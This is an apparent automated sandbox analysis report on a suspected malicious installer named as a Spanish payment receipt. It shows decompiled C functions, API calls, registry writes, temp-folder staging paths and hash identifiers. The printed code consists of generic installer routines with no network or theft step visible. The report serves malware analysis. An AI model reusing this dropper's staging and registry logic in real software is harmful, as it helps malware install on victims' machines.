                                        • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                        • Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
                                        • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                        • Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 765 405d80-405d8c 766 405d8d-405dc1 GetTickCount GetTempFileNameW 765->766 767 405dd0-405dd2 766->767 768 405dc3-405dc5 766->768 770 405dca-405dcd 767->770 768->766 769 405dc7 768->769 769->770
                                        C-Code - Quality: 100%
                                        			E00405D80(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                        				intOrPtr _v8;
                                        				short _v12;
                                        				short _t12;
                                        				intOrPtr _t13;
                                        				signed int _t14;
                                        				WCHAR* _t17;
                                        				signed int _t19;
                                        				signed short _t23;
                                        				WCHAR* _t26;
                                        
                                        				_t26 = _a4;
                                        				_t23 = 0x64;
                                        				while(1) {
                                        					_t12 =  *L"nsa"; // 0x73006e
                                        					_t23 = _t23 - 1;
                                        					_v12 = _t12;
                                        					_t13 =  *0x40a55c; // 0x61
                                        					_v8 = _t13;
                                        					_t14 = GetTickCount();
                                        					_t19 = 0x1a;
                                        					_v8 = _v8 + _t14 % _t19;
                                        					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                        					if(_t17 != 0) {
                                        						break;
                                        					}
                                        					if(_t23 != 0) {
                                        						continue;
                                        					} else {
                                        						 *_t26 =  *_t26 & _t23;
                                        					}
                                        					L4:
                                        					return _t17;
                                        				}
                                        				_t17 = _t26;
                                        				goto L4;
                                        			}












                                        0x00405d86
                                        0x00405d8c
                                        0x00405d8d
                                        0x00405d8d
                                        0x00405d92
                                        0x00405d93
                                        0x00405d96
                                        0x00405d9b
                                        0x00405d9e
                                        0x00405da8
                                        0x00405db5
                                        0x00405db9
                                        0x00405dc1
                                        0x00000000
                                        0x00000000
                                        0x00405dc5
                                        0x00000000
                                        0x00405dc7
                                        0x00405dc7
                                        0x00405dc7
                                        0x00405dca
                                        0x00405dcd
                                        0x00405dcd
                                        0x00405dd0
                                        0x00000000

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405D9E
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76583420,0040359C), ref: 00405DB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-1716097560
                                        • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                        • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                        • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                        • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 771 10001759-10001795 call 10001b18 775 100018a6-100018a8 771->775 776 1000179b-1000179f 771->776 777 100017a1-100017a7 call 10002286 776->777 778 100017a8-100017b5 call 100022d0 776->778 777->778 783 100017e5-100017ec 778->783 784 100017b7-100017bc 778->784 785 1000180c-10001810 783->785 786 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 783->786 787 100017d7-100017da 784->787 788 100017be-100017bf 784->788 793 10001812-1000184c call 100015b4 call 100024a4 785->793 794 1000184e-10001854 call 100024a4 785->794 810 10001855-10001859 786->810 787->783 789 100017dc-100017dd call 10002b57 787->789 791 100017c1-100017c2 788->791 792 100017c7-100017c8 call 1000289c 788->792 802 100017e2 789->802 798 100017c4-100017c5 791->798 799 100017cf-100017d5 call 10002640 791->799 805 100017cd 792->805 793->810 794->810 798->783 798->792 809 100017e4 799->809 802->809 805->802 809->783 814 10001896-1000189d 810->814 815 1000185b-10001869 call 10002467 810->815 814->775 817 1000189f-100018a0 GlobalFree 814->817 821 10001881-10001888 815->821 822 1000186b-1000186e 815->822 817->775 821->814 824 1000188a-10001895 call 1000153d 821->824 822->821 823 10001870-10001878 822->823 823->821 825 1000187a-1000187b FreeLibrary 823->825 824->814 825->821
                                        C-Code - Quality: 92%
                                        			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                        				void _v36;
                                        				struct HINSTANCE__* _t34;
                                        				void* _t36;
                                        				intOrPtr _t38;
                                        				void* _t44;
                                        				void* _t45;
                                        				void* _t46;
                                        				void* _t50;
                                        				intOrPtr _t53;
                                        				signed int _t57;
                                        				signed int _t61;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t70;
                                        				void* _t74;
                                        
                                        				_t74 = __esi;
                                        				_t66 = __edi;
                                        				_t65 = __edx;
                                        				 *0x1000406c = _a8;
                                        				 *0x10004070 = _a16;
                                        				 *0x10004074 = _a12;
                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                        				_push("true");
                                        				_t34 = E10001B18();
                                        				_t50 = _t34;
                                        				if(_t50 == 0) {
                                        					L28:
                                        					return _t34;
                                        				} else {
                                        					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                        						E10002286(_t50);
                                        					}
                                        					_push(_t50);
                                        					E100022D0(_t65);
                                        					_t53 =  *((intOrPtr*)(_t50 + 4));
                                        					if(_t53 == 0xffffffff) {
                                        						L14:
                                        						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                        							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                        								_t34 = E100024A4(_t50);
                                        							} else {
                                        								_push(_t74);
                                        								_push(_t66);
                                        								_t12 = _t50 + 0x1018; // 0x1018
                                        								_t57 = 8;
                                        								memcpy( &_v36, _t12, _t57 << 2);
                                        								_t38 = E100015B4(_t50);
                                        								_t15 = _t50 + 0x1018; // 0x1018
                                        								_t70 = _t15;
                                        								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                        								 *_t70 = 4;
                                        								E100024A4(_t50);
                                        								_t61 = 8;
                                        								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                        							}
                                        						} else {
                                        							E100024A4(_t50);
                                        							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                        						}
                                        						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                        							_t34 = E10002467(_t50);
                                        							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                        								_t34 =  *(_t50 + 0x1008);
                                        								if(_t34 != 0) {
                                        									_t34 = FreeLibrary(_t34);
                                        								}
                                        							}
                                        							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                        								_t34 = E1000153D( *0x10004068);
                                        							}
                                        						}
                                        						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                        							goto L28;
                                        						} else {
                                        							_t36 = GlobalFree(_t50); // executed
                                        							return _t36;
                                        						}
                                        					}
                                        					_t44 =  *_t50;
                                        					if(_t44 == 0) {
                                        						if(_t53 != 1) {
                                        							goto L14;
                                        						}
                                        						E10002B57(_t50);
                                        						L12:
                                        						_t50 = _t44;
                                        						L13:
                                        						goto L14;
                                        					}
                                        					_t45 = _t44 - 1;
                                        					if(_t45 == 0) {
                                        						L8:
                                        						_t44 = E1000289C(_t53, _t50); // executed
                                        						goto L12;
                                        					}
                                        					_t46 = _t45 - 1;
                                        					if(_t46 == 0) {
                                        						E10002640(_t50);
                                        						goto L13;
                                        					}
                                        					if(_t46 != 1) {
                                        						goto L14;
                                        					}
                                        					goto L8;
                                        				}
                                        			}


















                                        0x10001759
                                        0x10001759
                                        0x10001759
                                        0x10001763
                                        0x1000176b
                                        0x10001778
                                        0x10001786
                                        0x10001789
                                        0x1000178b
                                        0x10001790
                                        0x10001795
                                        0x100018a8
                                        0x100018a8
                                        0x1000179b
                                        0x1000179f
                                        0x100017a2
                                        0x100017a7
                                        0x100017a8
                                        0x100017a9
                                        0x100017af
                                        0x100017b5
                                        0x100017e5
                                        0x100017ec
                                        0x10001810
                                        0x1000184f
                                        0x10001812
                                        0x10001812
                                        0x10001813
                                        0x10001816
                                        0x1000181c
                                        0x10001820
                                        0x10001823
                                        0x10001828
                                        0x10001828
                                        0x1000182f
                                        0x10001835
                                        0x1000183b
                                        0x10001847
                                        0x10001848
                                        0x1000184b
                                        0x100017ee
                                        0x100017ef
                                        0x10001804
                                        0x10001804
                                        0x10001859
                                        0x1000185c
                                        0x10001869
                                        0x10001870
                                        0x10001878
                                        0x1000187b
                                        0x1000187b
                                        0x10001878
                                        0x10001888
                                        0x10001890
                                        0x10001895
                                        0x10001888
                                        0x1000189d
                                        0x00000000
                                        0x1000189f
                                        0x100018a0
                                        0x00000000
                                        0x100018a0
                                        0x1000189d
                                        0x100017b9
                                        0x100017bc
                                        0x100017da
                                        0x00000000
                                        0x00000000
                                        0x100017dd
                                        0x100017e2
                                        0x100017e2
                                        0x100017e4
                                        0x00000000
                                        0x100017e4
                                        0x100017be
                                        0x100017bf
                                        0x100017c7
                                        0x100017c8
                                        0x00000000
                                        0x100017c8
                                        0x100017c1
                                        0x100017c2
                                        0x100017d0
                                        0x00000000
                                        0x100017d0
                                        0x100017c5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x100017c5

                                        APIs
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                        • GlobalFree.KERNELBASE(00000000), ref: 100018A0
                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                          • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                        • String ID:
                                        • API String ID: 1791698881-3916222277
                                        • Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                        • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                        • Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                        • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                        				void* _t20;
                                        				void* _t21;
                                        				int _t24;
                                        				long _t25;
                                        				int _t30;
                                        				intOrPtr _t33;
                                        				void* _t34;
                                        				intOrPtr _t37;
                                        				void* _t39;
                                        				void* _t42;
                                        
                                        				_t33 = __edx;
                                        				_t30 = __ebx;
                                        				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                        				_t34 = __eax;
                                        				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                        				 *(_t39 - 0x3c) = E00402C37(2);
                                        				_t20 = E00402C37(0x11);
                                        				 *(_t39 - 4) = 1;
                                        				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
                                        				 *(_t39 + 8) = _t21;
                                        				if(_t21 != __ebx) {
                                        					_t24 = 0;
                                        					if(_t37 == 1) {
                                        						E00402C37(0x23);
                                        						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
                                        					}
                                        					if(_t37 == 4) {
                                        						 *0x40b5a8 = E00402C15(3);
                                        						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                        						_t24 = _t37;
                                        					}
                                        					if(_t37 == 3) {
                                        						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
                                        					}
                                        					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
                                        					if(_t25 == 0) {
                                        						 *(_t39 - 4) = _t30;
                                        					}
                                        					_push( *(_t39 + 8));
                                        					RegCloseKey(); // executed
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                        				return 0;
                                        			}













                                        0x004023de
                                        0x004023de
                                        0x004023de
                                        0x004023e1
                                        0x004023e8
                                        0x004023f2
                                        0x004023f5
                                        0x004023fe
                                        0x00402405
                                        0x0040240c
                                        0x0040240f
                                        0x00402415
                                        0x0040241f
                                        0x00402423
                                        0x0040242e
                                        0x0040242e
                                        0x00402435
                                        0x0040243f
                                        0x00402445
                                        0x00402448
                                        0x00402448
                                        0x0040244c
                                        0x00402458
                                        0x00402458
                                        0x00402469
                                        0x00402471
                                        0x00402473
                                        0x00402473
                                        0x00402476
                                        0x00402551
                                        0x00402551
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402429
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402469
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp
                                        • API String ID: 2655323295-725846307
                                        • Opcode ID: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
                                        • Instruction ID: 065199c4180da03f85bcad36feea8d83242cacde3b0560515a804f641c4ac6e3
                                        • Opcode Fuzzy Hash: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
                                        • Instruction Fuzzy Hash: 21119371E00108BEEB10AFA5DE49EAEBAB4EB54354F11803BF504F71D1DBB84D419B58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E004015C1(short __ebx, void* __eflags) {
                                        				void* _t17;
                                        				int _t23;
                                        				void* _t25;
                                        				signed char _t26;
                                        				short _t28;
                                        				short _t31;
                                        				short* _t34;
                                        				void* _t36;
                                        
                                        				_t28 = __ebx;
                                        				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                        				_t17 = E00405BDB(_t16);
                                        				_t32 = _t17;
                                        				if(_t17 != __ebx) {
                                        					do {
                                        						_t34 = E00405B5D(_t32, 0x5c);
                                        						_t31 =  *_t34;
                                        						 *_t34 = _t28;
                                        						if(_t31 != _t28) {
                                        							L5:
                                        							_t25 = E0040580F( *(_t36 + 8));
                                        						} else {
                                        							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                        							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040582C(_t42) == 0) {
                                        								goto L5;
                                        							} else {
                                        								_t25 = E00405792( *(_t36 + 8)); // executed
                                        							}
                                        						}
                                        						if(_t25 != _t28) {
                                        							if(_t25 != 0xb7) {
                                        								L9:
                                        								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                        							} else {
                                        								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                        								if((_t26 & 0x00000010) == 0) {
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        						 *_t34 = _t31;
                                        						_t32 = _t34 + 2;
                                        					} while (_t31 != _t28);
                                        				}
                                        				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                        					_push(0xfffffff5);
                                        					E00401423();
                                        				} else {
                                        					E00401423(0xffffffe6);
                                        					E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated\\Stereoing",  *(_t36 + 8));
                                        					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                        					if(_t23 == 0) {
                                        						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                        					}
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
                                        				return 0;
                                        			}











                                        0x004015c1
                                        0x004015c9
                                        0x004015cc
                                        0x004015d1
                                        0x004015d5
                                        0x004015d7
                                        0x004015df
                                        0x004015e1
                                        0x004015e4
                                        0x004015ea
                                        0x00401604
                                        0x00401607
                                        0x004015ec
                                        0x004015ec
                                        0x004015ef
                                        0x00000000
                                        0x004015fa
                                        0x004015fd
                                        0x004015fd
                                        0x004015ef
                                        0x0040160e
                                        0x00401615
                                        0x00401624
                                        0x00401624
                                        0x00401617
                                        0x0040161a
                                        0x00401622
                                        0x00000000
                                        0x00000000
                                        0x00401622
                                        0x00401615
                                        0x00401627
                                        0x0040162b
                                        0x0040162c
                                        0x004015d7
                                        0x00401634
                                        0x00401663
                                        0x00402245
                                        0x00401636
                                        0x00401638
                                        0x00401645
                                        0x0040164d
                                        0x00401655
                                        0x0040165b
                                        0x0040165b
                                        0x00401655
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                          • Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405BE9
                                          • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                          • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                          • Part of subcall function 00405792: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing,?,00000000,000000F0), ref: 0040164D
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing, xrefs: 00401640
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing
                                        • API String ID: 1892508949-2217710947
                                        • Opcode ID: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
                                        • Instruction ID: a664f1efeb726e69a6ab8af553608a028f51c0b4cf1c5e7724f5d8b0eae84205
                                        • Opcode Fuzzy Hash: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
                                        • Instruction Fuzzy Hash: 9311BE31504504EBCF317FA0CD4159F36A0EF15368B28493BEA45B22F2DB3E4D519A5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E0040612D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                        				int _v8;
                                        				long _t21;
                                        				long _t24;
                                        				char* _t30;
                                        
                                        				asm("sbb eax, eax");
                                        				_v8 = 0x800;
                                        				_t21 = E004060CC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                        				_t30 = _a16;
                                        				if(_t21 != 0) {
                                        					L4:
                                        					 *_t30 =  *_t30 & 0x00000000;
                                        				} else {
                                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                        					_t21 = RegCloseKey(_a20);
                                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                        						goto L4;
                                        					}
                                        				}
                                        				return _t21;
                                        			}







                                        0x0040613b
                                        0x0040613d
                                        0x00406155
                                        0x0040615a
                                        0x0040615f
                                        0x0040619d
                                        0x0040619d
                                        0x00406161
                                        0x00406173
                                        0x0040617e
                                        0x00406184
                                        0x0040618f
                                        0x00000000
                                        0x00000000
                                        0x0040618f
                                        0x004061a3

                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
                                        • RegCloseKey.ADVAPI32(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
